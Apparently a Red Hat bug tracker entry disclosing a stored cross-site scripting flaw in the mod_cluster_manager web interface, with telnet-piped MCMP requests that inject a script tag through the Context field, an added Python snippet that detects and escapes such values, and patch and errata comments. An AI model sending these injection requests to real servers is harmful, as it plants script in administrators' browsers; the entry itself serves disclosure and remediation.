Michal Babacek from Red Hat discovered [1] that it's possible to inject arbitrary JavaScript code in the mod_manager web interface using MCMP messages:

- With mod_cluster Manager running on 127.0.0.1:6666 run the commands below:

"""
{ echo "CONFIG / HTTP/1.1"; echo "Host: localhost.localdomain:6666"; echo "Content-Length: 95"; echo "User-Agent: Prdel"; echo ""; echo "JVMRoute=fake-1&Ho5t=127.0.0.1&Maxattempts=1&Port=8009&StickySessionForce=No&Type=ajp&ping=10"; sleep 1;} | telnet 127.0.0.1 6666

{ echo "ENABLE-APP / HTTP/1.1"; echo "Host: localhost.localdomain:6666"; echo "Content-Length: 102"; echo "User-Agent: ClusterListener%2F1.0"; echo ""; echo 'JVMRoute%3Dfake-1%26Alias%3Ddefault-host%26Context%3D%2FX%3Cscript%3Ealert(%27X%27)%3B%3C%2Fscript%3E'; sleep 1;} | telnet 127.0.0.1 6666
"""

- Open http://localhost:6666/mod_cluster_manager and you'll see a JavaScript pop-up Alert being executed.

Proposed (intrusive) patch and further discussion is available at [1].

[1]: https://issues.jboss.org/browse/MODCLUSTER-453
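The root cause above is that a value taken from an MCMP message body (here the Context of an ENABLE-APP request) is written into the mod_cluster_manager HTML page without escaping. The following added example, not part of this report or of the mod_cluster project, parses the two message bodies from the reproduction (embedded as constructed samples), flags decoded field values that carry HTML metacharacters so a proxy or log review can spot them, and shows the escaped form the manager page should emit. The set of fields treated as "rendered" and the table-cell markup are assumptions for illustration.

```python
import html
from urllib.parse import parse_qsl, unquote

# Constructed samples: the two MCMP bodies from the reproduction above.
CONFIG_BODY = ("JVMRoute=fake-1&Ho5t=127.0.0.1&Maxattempts=1&Port=8009"
               "&StickySessionForce=No&Type=ajp&ping=10")
ENABLE_APP_BODY = ("JVMRoute%3Dfake-1%26Alias%3Ddefault-host%26Context%3D"
                   "%2FX%3Cscript%3Ealert(%27X%27)%3B%3C%2Fscript%3E")

# Assumption: these MCMP fields end up in the mod_cluster_manager page.
RENDERED_FIELDS = {"JVMRoute", "Alias", "Context", "Host", "Type"}
UNSAFE_CHARS = set('<>"\'&')


def parse_mcmp_body(body: str) -> dict:
    """Parse an MCMP body ('key=value' pairs joined with '&') into a dict.

    The ENABLE-APP body in the report is URL-encoded once more ('%3D',
    '%26'), so peel that layer off until a literal '=' separator appears.
    parse_qsl then decodes the individual values."""
    decoded = body.strip()
    while "=" not in decoded and "%3D" in decoded.upper():
        decoded = unquote(decoded)
    return dict(parse_qsl(decoded, keep_blank_values=True))


def find_unsafe_fields(body: str) -> dict:
    """Return rendered fields whose decoded value contains HTML metacharacters.

    An empty dict means nothing in this message could break out of the
    manager page's markup; a non-empty dict is worth alerting on."""
    fields = parse_mcmp_body(body)
    return {name: value for name, value in fields.items()
            if name in RENDERED_FIELDS and UNSAFE_CHARS & set(value)}


def render_cell(value: str) -> str:
    """Emit a value the way the manager page should: HTML-escaped, so the
    browser shows '<script>' as text instead of executing it."""
    return "<td>" + html.escape(value, quote=True) + "</td>"


if __name__ == "__main__":
    for label, body in (("CONFIG", CONFIG_BODY), ("ENABLE-APP", ENABLE_APP_BODY)):
        suspicious = find_unsafe_fields(body)
        print(label, "unsafe fields:", suspicious or "none")
        for value in suspicious.values():
            print("  escaped:", render_cell(value))
```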
Ad Comment 0: [1] https://issues.jboss.org/secure/attachment/12388047/12388047_MODCLUSTER-453_master-better_one.patch
Removing embargo, as the patch has been included in EAP 6.4.
This issue has been addressed in the following products:

  JBoss Web Server 2.1.0

Via RHSA-2015:1641 https://rhn.redhat.com/errata/RHSA-2015-1641.html
This issue has been addressed in the following products:

  JBEWS 2 for RHEL 6
  JBEWS 2 for RHEL 7
  JBEWS 2 for RHEL 5

Via RHSA-2015:1642 https://rhn.redhat.com/errata/RHSA-2015-1642.html